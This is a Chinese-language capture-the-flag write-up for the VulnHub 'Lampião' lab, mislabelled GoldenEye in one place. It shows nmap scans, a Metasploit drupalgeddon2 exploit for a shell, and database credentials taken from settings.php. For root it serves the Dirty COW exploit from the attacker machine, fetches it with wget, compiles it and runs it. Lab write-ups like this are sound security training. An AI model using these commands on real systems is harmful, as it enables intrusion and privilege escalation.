0%

vulnHub靶机系列:Lampiao渗透Writeup

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! “Lampião 1”.

Get root!

前言

本靶场目标:获取root权限

0x01 靶机环境

靶机:GoldenEye 192.168.221.136

攻击机:kali 192.168.221.130

0x02 信息收集

获取目标IP

1
nmap -sP 192.168.221.0/24

服务扫描及信息收集

1
nmap -sV -vv -p 1-65535 192.168.221.136

22:ssh

80

1898:apache 2.4.7,此服务识别不了,直接返回数据

0x03 漏洞探测及利用

访问1898端口为用户登录页面。dirb扫1898服务所有目录,发现敏感目录robots.txt

robots.txt中记录了网站日志更改记录文件

durpal

用durpal7的cms建站

1
2
3
4
5
6
7
8
msfconsole
search dupral
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.221.136
set rport 1898
exploit
# 直接拿下shell
shell

但www-data权限较低

切换到/bin/bash目录:

1
python -c 'import pty;pty.spawn("/bin/bash")'

可以看到home路径下,用户名为tiago

数据库

网站一般有数据库的配置文件,在/var/www/html/sites/下有setting.php中写了数据库的用户名和密码

用户名:drupaluser

密码:Virgulino

在users表中发现name和password。密码一般为md5加密,但并未查出来

SSH访问服务器

1
ssh tiago@192.168.221.136

以tiago身份登录服务器成功

提权

查看靶机内核

1
2
lsb_release -a
uname -a

考虑用16年的dirtycow提取

1
2
3
4
search 
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /var/www/html
cd /var/www/html
python -m SimpleHTTPServer 80

靶机:

1
2
3
4
5
wget  http://192.168.221.130/40847.cpp
chmod 777 40847.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s

参数解释:

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

拿到flag

0x04 复盘

  • 其实一般流程就是信息收集:
    1. 端口 服务,再者是网站的目录,获取普通权限。
    2. 获取使用的CMS或者中间件,去查找其对应的漏洞,然后上传exp,编译执行拿到一定权限。
    3. 进入bin/bash。查找网站配置文件,寻找数据库用户名密码登录拖库。
    4. 亦或者是ssh连接,然后用提权EXP进行提权,最终拿到root权限
  • 远程bash的上下左右键或者delete键键入会产生很奇怪的符号,敲代码的时候就很难受
  • 脏牛提权脚本中有其如何执行的注释,之后的EXP记得看

0x05 todolist

  1. dirtycow漏洞具体原理
  2. dupal漏洞的具体原理

参考:

  1. 靶机地址:https://www.vulnhub.com/
  2. 文章参考:https://www.jianshu.com/p/ce319b350885?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation
你想在文章末尾对读者说的话